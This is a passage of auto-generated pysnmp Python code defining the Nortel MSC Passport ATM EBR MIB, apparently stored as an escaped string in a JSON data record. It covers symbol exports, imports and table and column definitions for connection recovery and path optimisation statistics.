mscAtmIfVptVccEbrInfoIndex=mscAtmIfVptVccEbrInfoIndex,\n mscAtmIfPnniEbrTotalConnectionRecoveries=\n mscAtmIfPnniEbrTotalConnectionRecoveries,\n mscAtmIfVptVccEbrInfoOperTable=mscAtmIfVptVccEbrInfoOperTable,\n mscAtmIfPnniEbrEligibleRecoveredConnections=\n mscAtmIfPnniEbrEligibleRecoveredConnections,\n mscAtmIfVpcEbrInfoRecoverySubscribed=\n mscAtmIfVpcEbrInfoRecoverySubscribed, mscAtmIfVptVccSrcEbrOvProvTable=\n mscAtmIfVptVccSrcEbrOvProvTable,\n mscAtmIfVptVccEbrInfoConnectionRecovered=\n mscAtmIfVptVccEbrInfoConnectionRecovered,\n mscAtmIfVptIispEbrComponentName=mscAtmIfVptIispEbrComponentName,\n mscAtmIfVptUniEbrComponentName=mscAtmIfVptUniEbrComponentName,\n mscAtmIfVptVccEbrInfoRowStatusEntry=mscAtmIfVptVccEbrInfoRowStatusEntry,\n mscAtmIfIispEbrComponentName=mscAtmIfIispEbrComponentName,\n mscAtmIfPnniEbrOperEntry=mscAtmIfPnniEbrOperEntry,\n mscAtmIfVptIispEbrTotalPathOptimizations=\n mscAtmIfVptIispEbrTotalPathOptimizations, mscAtmIfVccEbrInfo=\n mscAtmIfVccEbrInfo, mscAtmIfVptUniEbrIndex=mscAtmIfVptUniEbrIndex,\n mscAtmIfVptUniEbrIneligibleRecoveredConnections=\n mscAtmIfVptUniEbrIneligibleRecoveredConnections, atmEbrCapabilitiesCA02\n =atmEbrCapabilitiesCA02, mscAtmIfVptUniEbrRowStatusTable=\n mscAtmIfVptUniEbrRowStatusTable, mscAtmIfVptVccEbrInfoRowStatusTable=\n mscAtmIfVptVccEbrInfoRowStatusTable, mscAtmIfVptIispEbrProvTable=\n mscAtmIfVptIispEbrProvTable, mscAtmIfVpcSrcEbrOvOptimizationSubscribed=\n mscAtmIfVpcSrcEbrOvOptimizationSubscribed,\n mscAtmIfIispEbrTotalPathOptimizations=\n mscAtmIfIispEbrTotalPathOptimizations, mscAtmIfVccSrcEbrOvComponentName\n =mscAtmIfVccSrcEbrOvComponentName,\n mscAtmIfVccSrcEbrOvOptimizationSubscribed=\n mscAtmIfVccSrcEbrOvOptimizationSubscribed, mscAtmIfUniEbrOperTable=\n mscAtmIfUniEbrOperTable, mscAtmIfIispEbrStorageType=\n mscAtmIfIispEbrStorageType, mscAtmIfVptVccSrcEbrOv=\n mscAtmIfVptVccSrcEbrOv, mscAtmIfIispEbrStatsTable=\n mscAtmIfIispEbrStatsTable, mscAtmIfUniEbrSubscribedConnections=\n mscAtmIfUniEbrSubscribedConnections, mscAtmIfUniEbrRowStatusTable=\n mscAtmIfUniEbrRowStatusTable, mscAtmIfIispEbrStatsEntry=\n mscAtmIfIispEbrStatsEntry, mscAtmIfVptVccEbrInfoOperEntry=\n mscAtmIfVptVccEbrInfoOperEntry, mscAtmIfIispEbrRowStatusEntry=\n mscAtmIfIispEbrRowStatusEntry,\n mscAtmIfVptIispEbrIneligibleRecoveredConnections=\n mscAtmIfVptIispEbrIneligibleRecoveredConnections,\n atmEbrCapabilitiesCA02A=atmEbrCapabilitiesCA02A,\n mscAtmIfVptVccEbrInfoOptimizationSubscribed=\n mscAtmIfVptVccEbrInfoOptimizationSubscribed, mscAtmIfVccEbrInfoIndex=\n mscAtmIfVccEbrInfoIndex, mscAtmIfIispEbrPathOptimization=\n mscAtmIfIispEbrPathOptimization, mscAtmIfPnniEbrRowStatusEntry=\n mscAtmIfPnniEbrRowStatusEntry, mscAtmIfVptIispEbrSubscribedConnections=\n mscAtmIfVptIispEbrSubscribedConnections, mscAtmIfUniEbrStatsTable=\n mscAtmIfUniEbrStatsTable, mscAtmIfVptUniEbrStatsTable=\n mscAtmIfVptUniEbrStatsTable, mscAtmIfVptPnniEbrRowStatus=\n mscAtmIfVptPnniEbrRowStatus, mscAtmIfVptUniEbrProvTable=\n mscAtmIfVptUniEbrProvTable, mscAtmIfVptUniEbrOperEntry=\n mscAtmIfVptUniEbrOperEntry, mscAtmIfVccEbrInfoRecoverySubscribed=\n mscAtmIfVccEbrInfoRecoverySubscribed, mscAtmIfVpcEbrInfo=\n mscAtmIfVpcEbrInfo, mscAtmIfPnniEbrIneligibleRecoveredConnections=\n mscAtmIfPnniEbrIneligibleRecoveredConnections,\n mscAtmIfVpcSrcEbrOvRowStatusTable=mscAtmIfVpcSrcEbrOvRowStatusTable,\n mscAtmIfVptPnniEbrIneligibleRecoveredConnections=\n mscAtmIfVptPnniEbrIneligibleRecoveredConnections,\n mscAtmIfVpcEbrInfoConnectionRecovered=\n mscAtmIfVpcEbrInfoConnectionRecovered, mscAtmIfVccSrcEbrOvProvTable=\n mscAtmIfVccSrcEbrOvProvTable, mscAtmIfVccEbrInfoRowStatusTable=\n mscAtmIfVccEbrInfoRowStatusTable, mscAtmIfVccEbrInfoStorageType=\n mscAtmIfVccEbrInfoStorageType, mscAtmIfVpcEbrInfoTotalPathOptimizations\n =mscAtmIfVpcEbrInfoTotalPathOptimizations, mscAtmIfVptIispEbr=\n mscAtmIfVptIispEbr, mscAtmIfVpcEbrInfoRowStatus=\n mscAtmIfVpcEbrInfoRowStatus, mscAtmIfVccSrcEbrOvRowStatusTable=\n mscAtmIfVccSrcEbrOvRowStatusTable, mscAtmIfIispEbrConnectionRecovery=\n mscAtmIfIispEbrConnectionRecovery, mscAtmIfVccSrcEbrOvProvEntry=\n mscAtmIfVccSrcEbrOvProvEntry, mscAtmIfUniEbrIndex=mscAtmIfUniEbrIndex,\n mscAtmIfVptUniEbrTotalConnectionRecoveries=\n mscAtmIfVptUniEbrTotalConnectionRecoveries,\n mscAtmIfVpcEbrInfoTotalConnectionRecoveries=\n mscAtmIfVpcEbrInfoTotalConnectionRecoveries,\n mscAtmIfVptVccSrcEbrOvRowStatusEntry=\n mscAtmIfVptVccSrcEbrOvRowStatusEntry,\n mscAtmIfIispEbrTotalConnectionRecoveries=\n mscAtmIfIispEbrTotalConnectionRecoveries, mscAtmIfIispEbrRowStatus=\n mscAtmIfIispEbrRowStatus, mscAtmIfVpcSrcEbrOvProvTable=\n mscAtmIfVpcSrcEbrOvProvTable, mscAtmIfVptUniEbrRowStatus=\n mscAtmIfVptUniEbrRowStatus, mscAtmIfPnniEbrRowStatusTable=\n mscAtmIfPnniEbrRowStatusTable, mscAtmIfPnniEbrStatsEntry=\n mscAtmIfPnniEbrStatsEntry, mscAtmIfVpcSrcEbrOvIndex=\n mscAtmIfVpcSrcEbrOvIndex, mscAtmIfVpcEbrInfoComponentName=\n mscAtmIfVpcEbrInfoComponentName, mscAtmIfVptIispEbrPathOptimization=\n mscAtmIfVptIispEbrPathOptimization, mscAtmIfVpcSrcEbrOvRowStatus=\n mscAtmIfVpcSrcEbrOvRowStatus, mscAtmIfVpcEbrInfoRowStatusEntry=\n mscAtmIfVpcEbrInfoRowStatusEntry, mscAtmIfVptPnniEbrOperEntry=\n mscAtmIfVptPnniEbrOperEntry, mscAtmIfIispEbrSubscribedConnections=\n mscAtmIfIispEbrSubscribedConnections, mscAtmIfVccSrcEbrOv=\n mscAtmIfVccSrcEbrOv, mscAtmIfVptIispEbrEligibleRecoveredConnections=\n mscAtmIfVptIispEbrEligibleRecoveredConnections, mscAtmIfUniEbrProvEntry\n =mscAtmIfUniEbrProvEntry, mscAtmIfVpcEbrInfoRowStatusTable=\n mscAtmIfVpcEbrInfoRowStatusTable, mscAtmIfVptPnniEbrComponentName=\n mscAtmIfVptPnniEbrComponentName, mscAtmIfVptPnniEbrConnectionRecovery=\n mscAtmIfVptPnniEbrConnectionRecovery, mscAtmIfVptVccSrcEbrOvRowStatus=\n mscAtmIfVptVccSrcEbrOvRowStatus, mscAtmIfVptIispEbrRowStatusTable=\n mscAtmIfVptIispEbrRowStatusTable, mscAtmIfVptPnniEbrStorageType=\n mscAtmIfVptPnniEbrStorageType, mscAtmIfVptVccEbrInfoStorageType=\n mscAtmIfVptVccEbrInfoStorageType, mscAtmIfIispEbr=mscAtmIfIispEbr,\n mscAtmIfVccEbrInfoOperEntry=mscAtmIfVccEbrInfoOperEntry,\n mscAtmIfVptPnniEbrTotalConnectionRecoveries=\n mscAtmIfVptPnniEbrTotalConnectionRecoveries, mscAtmIfPnniEbrRowStatus=\n mscAtmIfPnniEbrRowStatus, mscAtmIfVpcSrcEbrOvProvEntry=\n mscAtmIfVpcSrcEbrOvProvEntry, mscAtmIfVccEbrInfoRowStatus=\n mscAtmIfVccEbrInfoRowStatus, mscAtmIfVptIispEbrIndex=\n mscAtmIfVptIispEbrIndex, mscAtmIfVpcEbrInfoOperEntry=\n mscAtmIfVpcEbrInfoOperEntry, mscAtmIfVptIispEbrOperTable=\n mscAtmIfVptIispEbrOperTable, mscAtmIfUniEbrProvTable=\n mscAtmIfUniEbrProvTable, mscAtmIfPnniEbrPathOptimization=\n mscAtmIfPnniEbrPathOptimization, mscAtmIfVpcEbrInfoStatsTable=\n mscAtmIfVpcEbrInfoStatsTable, mscAtmIfVccSrcEbrOvIndex=\n mscAtmIfVccSrcEbrOvIndex, mscAtmIfPnniEbrSubscribedConnections=\n mscAtmIfPnniEbrSubscribedConnections, mscAtmIfVptIispEbrRowStatusEntry=\n mscAtmIfVptIispEbrRowStatusEntry, mscAtmIfIispEbrProvTable=\n mscAtmIfIispEbrProvTable, mscAtmIfVptVccSrcEbrOvComponentName=\n mscAtmIfVptVccSrcEbrOvComponentName,\n mscAtmIfVptUniEbrConnectionRecovery=mscAtmIfVptUniEbrConnectionRecovery,\n mscAtmIfVccSrcEbrOvStorageType=mscAtmIfVccSrcEbrOvStorageType,\n mscAtmIfVpcSrcEbrOv=mscAtmIfVpcSrcEbrOv,\n mscAtmIfVptPnniEbrRowStatusTable=mscAtmIfVptPnniEbrRowStatusTable,\n mscAtmIfUniEbrEligibleRecoveredConnections=\n mscAtmIfUniEbrEligibleRecoveredConnections,\n mscAtmIfVptUniEbrRowStatusEntry=mscAtmIfVptUniEbrRowStatusEntry,\n mscAtmIfVccSrcEbrOvRowStatus=mscAtmIfVccSrcEbrOvRowStatus,\n mscAtmIfIispEbrEligibleRecoveredConnections=\n mscAtmIfIispEbrEligibleRecoveredConnections, mscAtmIfPnniEbrOperTable=\n mscAtmIfPnniEbrOperTable, mscAtmIfVpcEbrInfoOperTable=\n mscAtmIfVpcEbrInfoOperTable, mscAtmIfVpcEbrInfoStatsEntry=\n mscAtmIfVpcEbrInfoStatsEntry, mscAtmIfVptUniEbrStorageType=\n mscAtmIfVptUniEbrStorageType, mscAtmIfVccEbrInfoStatsTable=\n mscAtmIfVccEbrInfoStatsTable, mscAtmIfVptVccEbrInfoStatsTable=\n mscAtmIfVptVccEbrInfoStatsTable, mscAtmIfUniEbrPathOptimization=\n mscAtmIfUniEbrPathOptimization, mscAtmIfVptPnniEbrStatsTable=\n mscAtmIfVptPnniEbrStatsTable, mscAtmIfVptUniEbrSubscribedConnections=\n mscAtmIfVptUniEbrSubscribedConnections, mscAtmIfVptVccEbrInfo=\n mscAtmIfVptVccEbrInfo, mscAtmIfPnniEbrConnectionRecovery=\n mscAtmIfPnniEbrConnectionRecovery,\n mscAtmIfVccEbrInfoConnectionRecovered=\n mscAtmIfVccEbrInfoConnectionRecovered, mscAtmIfVccEbrInfoStatsEntry=\n mscAtmIfVccEbrInfoStatsEntry,\n mscAtmIfVptVccEbrInfoTotalConnectionRecoveries=\n mscAtmIfVptVccEbrInfoTotalConnectionRecoveries,\n mscAtmIfUniEbrStorageType=mscAtmIfUniEbrStorageType,\n mscAtmIfVptUniEbrStatsEntry=mscAtmIfVptUniEbrStatsEntry,\n mscAtmIfVptPnniEbrProvTable=mscAtmIfVptPnniEbrProvTable,\n mscAtmIfVccSrcEbrOvRecoverySubscribed=\n mscAtmIfVccSrcEbrOvRecoverySubscribed, atmEbrCapabilities=\n atmEbrCapabilities, mscAtmIfUniEbrComponentName=\n mscAtmIfUniEbrComponentName, mscAtmIfPnniEbrTotalPathOptimizations=\n mscAtmIfPnniEbrTotalPathOptimizations,\n mscAtmIfUniEbrIneligibleRecoveredConnections=\n mscAtmIfUniEbrIneligibleRecoveredConnections, mscAtmIfPnniEbr=\n mscAtmIfPnniEbr, mscAtmIfVptIispEbrProvEntry=\n mscAtmIfVptIispEbrProvEntry, mscAtmIfUniEbrRowStatusEntry=\n mscAtmIfUniEbrRowStatusEntry, mscAtmIfVptPnniEbrRowStatusEntry=\n mscAtmIfVptPnniEbrRowStatusEntry, mscAtmIfVpcEbrInfoIndex=\n mscAtmIfVpcEbrInfoIndex, mscAtmIfVptVccSrcEbrOvProvEntry=\n mscAtmIfVptVccSrcEbrOvProvEntry, mscAtmIfVccEbrInfoOperTable=\n mscAtmIfVccEbrInfoOperTable, mscAtmIfVptVccEbrInfoStatsEntry=\n mscAtmIfVptVccEbrInfoStatsEntry, atmEbrGroupCA02A=atmEbrGroupCA02A,\n mscAtmIfVccEbrInfoOptimizationSubscribed=\n mscAtmIfVccEbrInfoOptimizationSubscribed,\n mscAtmIfVptVccSrcEbrOvRowStatusTable=\n mscAtmIfVptVccSrcEbrOvRowStatusTable, atmEbrMIB=atmEbrMIB,\n mscAtmIfVptVccEbrInfoRecoverySubscribed=\n mscAtmIfVptVccEbrInfoRecoverySubscribed,\n mscAtmIfVpcSrcEbrOvRowStatusEntry=mscAtmIfVpcSrcEbrOvRowStatusEntry,\n mscAtmIfVptVccEbrInfoRowStatus=mscAtmIfVptVccEbrInfoRowStatus,\n mscAtmIfVptIispEbrStatsEntry=mscAtmIfVptIispEbrStatsEntry,\n mscAtmIfPnniEbrStorageType=mscAtmIfPnniEbrStorageType,\n mscAtmIfPnniEbrProvEntry=mscAtmIfPnniEbrProvEntry,\n mscAtmIfVptUniEbrOperTable=mscAtmIfVptUniEbrOperTable,\n mscAtmIfIispEbrIneligibleRecoveredConnections=\n mscAtmIfIispEbrIneligibleRecoveredConnections,\n mscAtmIfVptIispEbrConnectionRecovery=\n mscAtmIfVptIispEbrConnectionRecovery, mscAtmIfVptUniEbr=\n mscAtmIfVptUniEbr, atmEbrGroupCA02=atmEbrGroupCA02,\n mscAtmIfVptIispEbrTotalConnectionRecoveries=\n mscAtmIfVptIispEbrTotalConnectionRecoveries,\n mscAtmIfUniEbrTotalPathOptimizations=\n mscAtmIfUniEbrTotalPathOptimizations,\n mscAtmIfVpcSrcEbrOvRecoverySubscribed=\n mscAtmIfVpcSrcEbrOvRecoverySubscribed, mscAtmIfVptPnniEbrOperTable=\n mscAtmIfVptPnniEbrOperTable,\n mscAtmIfVptVccSrcEbrOvOptimizationSubscribed=\n mscAtmIfVptVccSrcEbrOvOptimizationSubscribed,\n mscAtmIfVptUniEbrEligibleRecoveredConnections=\n mscAtmIfVptUniEbrEligibleRecoveredConnections,\n mscAtmIfVpcEbrInfoOptimizationSubscribed=\n mscAtmIfVpcEbrInfoOptimizationSubscribed, mscAtmIfVptPnniEbrIndex=\n mscAtmIfVptPnniEbrIndex, mscAtmIfUniEbrRowStatus=\n mscAtmIfUniEbrRowStatus, mscAtmIfUniEbrOperEntry=\n mscAtmIfUniEbrOperEntry, mscAtmIfVptVccSrcEbrOvStorageType=\n mscAtmIfVptVccSrcEbrOvStorageType,\n mscAtmIfVptPnniEbrTotalPathOptimizations=\n mscAtmIfVptPnniEbrTotalPathOptimizations,\n mscAtmIfVpcSrcEbrOvComponentName=mscAtmIfVpcSrcEbrOvComponentName,\n mscAtmIfVptVccEbrInfoComponentName=mscAtmIfVptVccEbrInfoComponentName,\n mscAtmIfIispEbrOperEntry=mscAtmIfIispEbrOperEntry,\n mscAtmIfVptVccSrcEbrOvRecoverySubscribed=\n mscAtmIfVptVccSrcEbrOvRecoverySubscribed, mscAtmIfIispEbrIndex=\n mscAtmIfIispEbrIndex, atmEbrCapabilitiesCA=atmEbrCapabilitiesCA,\n mscAtmIfVccEbrInfoTotalConnectionRecoveries=\n mscAtmIfVccEbrInfoTotalConnectionRecoveries)\n",
"step-3": "Integer, ObjectIdentifier, OctetString = mibBuilder.importSymbols('ASN1',\n 'Integer', 'ObjectIdentifier', 'OctetString')\nNamedValues, = mibBuilder.importSymbols('ASN1-ENUMERATION', 'NamedValues')\n(ValueRangeConstraint, SingleValueConstraint, ValueSizeConstraint,\n ConstraintsUnion, ConstraintsIntersection) = (mibBuilder.importSymbols(\n 'ASN1-REFINEMENT', 'ValueRangeConstraint', 'SingleValueConstraint',\n 'ValueSizeConstraint', 'ConstraintsUnion', 'ConstraintsIntersection'))\n(mscAtmIfIndex, mscAtmIfVptIndex, mscAtmIfVcc, mscAtmIfVptVccIndex,\n mscAtmIfVpc, mscAtmIfVptVcc, mscAtmIfVccIndex, mscAtmIfVpcIndex) = (\n mibBuilder.importSymbols('Nortel-MsCarrier-MscPassport-AtmCoreMIB',\n 'mscAtmIfIndex', 'mscAtmIfVptIndex', 'mscAtmIfVcc',\n 'mscAtmIfVptVccIndex', 'mscAtmIfVpc', 'mscAtmIfVptVcc',\n 'mscAtmIfVccIndex', 'mscAtmIfVpcIndex'))\nmscAtmIfIisp, mscAtmIfVptIisp, mscAtmIfVptIispIndex, mscAtmIfIispIndex = (\n mibBuilder.importSymbols('Nortel-MsCarrier-MscPassport-AtmIispMIB',\n 'mscAtmIfIisp', 'mscAtmIfVptIisp', 'mscAtmIfVptIispIndex',\n 'mscAtmIfIispIndex'))\n(mscAtmIfVpcSrc, mscAtmIfVptVccSrcIndex, mscAtmIfVccSrcIndex,\n mscAtmIfVptVccSrc, mscAtmIfVpcSrcIndex, mscAtmIfVccSrc) = (mibBuilder.\n importSymbols('Nortel-MsCarrier-MscPassport-AtmNetworkingMIB',\n 'mscAtmIfVpcSrc', 'mscAtmIfVptVccSrcIndex', 'mscAtmIfVccSrcIndex',\n 'mscAtmIfVptVccSrc', 'mscAtmIfVpcSrcIndex', 'mscAtmIfVccSrc'))\nmscAtmIfVptPnniIndex, mscAtmIfPnniIndex, mscAtmIfPnni, mscAtmIfVptPnni = (\n mibBuilder.importSymbols('Nortel-MsCarrier-MscPassport-AtmPnniMIB',\n 'mscAtmIfVptPnniIndex', 'mscAtmIfPnniIndex', 'mscAtmIfPnni',\n 'mscAtmIfVptPnni'))\nmscAtmIfVptUni, mscAtmIfUni, mscAtmIfUniIndex, mscAtmIfVptUniIndex = (\n mibBuilder.importSymbols('Nortel-MsCarrier-MscPassport-AtmUniMIB',\n 'mscAtmIfVptUni', 'mscAtmIfUni', 'mscAtmIfUniIndex', 'mscAtmIfVptUniIndex')\n )\nCounter32, DisplayString, Gauge32, StorageType, RowStatus = (mibBuilder.\n importSymbols(\n 'Nortel-MsCarrier-MscPassport-StandardTextualConventionsMIB',\n 'Counter32', 'DisplayString', 'Gauge32', 'StorageType', 'RowStatus'))\nNonReplicated, = mibBuilder.importSymbols(\n 'Nortel-MsCarrier-MscPassport-TextualConventionsMIB', 'NonReplicated')\nmscPassportMIBs, = mibBuilder.importSymbols(\n 'Nortel-MsCarrier-MscPassport-UsefulDefinitionsMIB', 'mscPassportMIBs')\nNotificationGroup, ModuleCompliance = mibBuilder.importSymbols('SNMPv2-CONF',\n 'NotificationGroup', 'ModuleCompliance')\n(Integer32, ObjectIdentity, ModuleIdentity, Bits, Counter32, IpAddress,\n Gauge32, NotificationType, iso, MibScalar, MibTable, MibTableRow,\n MibTableColumn, MibIdentifier, Unsigned32, Counter64, TimeTicks) = (\n mibBuilder.importSymbols('SNMPv2-SMI', 'Integer32', 'ObjectIdentity',\n 'ModuleIdentity', 'Bits', 'Counter32', 'IpAddress', 'Gauge32',\n 'NotificationType', 'iso', 'MibScalar', 'MibTable', 'MibTableRow',\n 'MibTableColumn', 'MibIdentifier', 'Unsigned32', 'Counter64', 'TimeTicks'))\nTextualConvention, DisplayString = mibBuilder.importSymbols('SNMPv2-TC',\n 'TextualConvention', 'DisplayString')\natmEbrMIB = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159))\nmscAtmIfVpcSrcEbrOv = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, \n 4, 6, 2))\nmscAtmIfVpcSrcEbrOvRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2,\n 1, 114, 4, 6, 2, 1))\nif mibBuilder.loadTexts:\n mscAtmIfVpcSrcEbrOvRowStatusTable.setStatus('mandatory')\nmscAtmIfVpcSrcEbrOvRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36,\n 2, 1, 114, 4, 6, 2, 1, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVpcIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmNetworkingMIB', 'mscAtmIfVpcSrcIndex'),\n (0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVpcSrcEbrOvIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfVpcSrcEbrOvRowStatusEntry.setStatus('mandatory')\nmscAtmIfVpcSrcEbrOvRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,\n 1, 114, 4, 6, 2, 1, 1, 1), RowStatus()).setMaxAccess('readwrite')\nif mibBuilder.loadTexts:\n mscAtmIfVpcSrcEbrOvRowStatus.setStatus('mandatory')\nmscAtmIfVpcSrcEbrOvComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, \n 36, 2, 1, 114, 4, 6, 2, 1, 1, 2), DisplayString()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVpcSrcEbrOvComponentName.setStatus('mandatory')\nmscAtmIfVpcSrcEbrOvStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,\n 2, 1, 114, 4, 6, 2, 1, 1, 4), StorageType()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVpcSrcEbrOvStorageType.setStatus('mandatory')\nmscAtmIfVpcSrcEbrOvIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,\n 114, 4, 6, 2, 1, 1, 10), NonReplicated())\nif mibBuilder.loadTexts:\n mscAtmIfVpcSrcEbrOvIndex.setStatus('mandatory')\nmscAtmIfVpcSrcEbrOvProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 4, 6, 2, 20))\nif mibBuilder.loadTexts:\n mscAtmIfVpcSrcEbrOvProvTable.setStatus('mandatory')\nmscAtmIfVpcSrcEbrOvProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,\n 114, 4, 6, 2, 20, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVpcIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmNetworkingMIB', 'mscAtmIfVpcSrcIndex'),\n (0, 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVpcSrcEbrOvIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfVpcSrcEbrOvProvEntry.setStatus('mandatory')\nmscAtmIfVpcSrcEbrOvRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, \n 562, 36, 2, 1, 114, 4, 6, 2, 20, 1, 1), Integer32().subtype(subtypeSpec\n =ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=\n NamedValues(('no', 0), ('yes', 1))).clone('yes')).setMaxAccess('readwrite')\nif mibBuilder.loadTexts:\n mscAtmIfVpcSrcEbrOvRecoverySubscribed.setStatus('mandatory')\nmscAtmIfVpcSrcEbrOvOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, \n 1, 562, 36, 2, 1, 114, 4, 6, 2, 20, 1, 2), Integer32().subtype(\n subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(\n namedValues=NamedValues(('no', 0), ('yes', 1))).clone('yes')).setMaxAccess(\n 'readwrite')\nif mibBuilder.loadTexts:\n mscAtmIfVpcSrcEbrOvOptimizationSubscribed.setStatus('mandatory')\nmscAtmIfVpcEbrInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4,\n 11))\nmscAtmIfVpcEbrInfoRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, \n 1, 114, 4, 11, 1))\nif mibBuilder.loadTexts:\n mscAtmIfVpcEbrInfoRowStatusTable.setStatus('mandatory')\nmscAtmIfVpcEbrInfoRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, \n 2, 1, 114, 4, 11, 1, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVpcIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVpcEbrInfoIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfVpcEbrInfoRowStatusEntry.setStatus('mandatory')\nmscAtmIfVpcEbrInfoRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2,\n 1, 114, 4, 11, 1, 1, 1), RowStatus()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVpcEbrInfoRowStatus.setStatus('mandatory')\nmscAtmIfVpcEbrInfoComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36,\n 2, 1, 114, 4, 11, 1, 1, 2), DisplayString()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVpcEbrInfoComponentName.setStatus('mandatory')\nmscAtmIfVpcEbrInfoStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, \n 2, 1, 114, 4, 11, 1, 1, 4), StorageType()).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVpcEbrInfoStorageType.setStatus('mandatory')\nmscAtmIfVpcEbrInfoIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 4, 11, 1, 1, 10), NonReplicated())\nif mibBuilder.loadTexts:\n mscAtmIfVpcEbrInfoIndex.setStatus('mandatory')\nmscAtmIfVpcEbrInfoOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 4, 11, 30))\nif mibBuilder.loadTexts:\n mscAtmIfVpcEbrInfoOperTable.setStatus('mandatory')\nmscAtmIfVpcEbrInfoOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,\n 114, 4, 11, 30, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVpcIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVpcEbrInfoIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfVpcEbrInfoOperEntry.setStatus('mandatory')\nmscAtmIfVpcEbrInfoRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, \n 562, 36, 2, 1, 114, 4, 11, 30, 1, 1), Integer32().subtype(subtypeSpec=\n ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=\n NamedValues(('no', 0), ('yes', 1)))).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVpcEbrInfoRecoverySubscribed.setStatus('mandatory')\nmscAtmIfVpcEbrInfoOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1,\n 562, 36, 2, 1, 114, 4, 11, 30, 1, 2), Integer32().subtype(subtypeSpec=\n ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=\n NamedValues(('no', 0), ('yes', 1)))).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVpcEbrInfoOptimizationSubscribed.setStatus('mandatory')\nmscAtmIfVpcEbrInfoConnectionRecovered = MibTableColumn((1, 3, 6, 1, 4, 1, \n 562, 36, 2, 1, 114, 4, 11, 30, 1, 3), Integer32().subtype(subtypeSpec=\n ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=\n NamedValues(('no', 0), ('yes', 1)))).setMaxAccess('readonly')\nif mibBuilder.loadTexts:\n mscAtmIfVpcEbrInfoConnectionRecovered.setStatus('mandatory')\nmscAtmIfVpcEbrInfoStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, \n 114, 4, 11, 40))\nif mibBuilder.loadTexts:\n mscAtmIfVpcEbrInfoStatsTable.setStatus('mandatory')\nmscAtmIfVpcEbrInfoStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1,\n 114, 4, 11, 40, 1)).setIndexNames((0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmCoreMIB', 'mscAtmIfVpcIndex'), (0,\n 'Nortel-MsCarrier-MscPassport-AtmEbrMIB', 'mscAtmIfVpcEbrInfoIndex'))\nif mibBuilder.loadTexts:\n mscAtmIfVpcEbrInfoStatsEntry.setStatus('mandatory')\nmscAtmIfVpcEbrInfoTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4,\n 1, 562, 36, 2, 1, 114, 4, 11, 40, 1, 1), Counter32()).setMaxAccess(\n 'readonly')\nif mibBuilder.loadTexts:\n 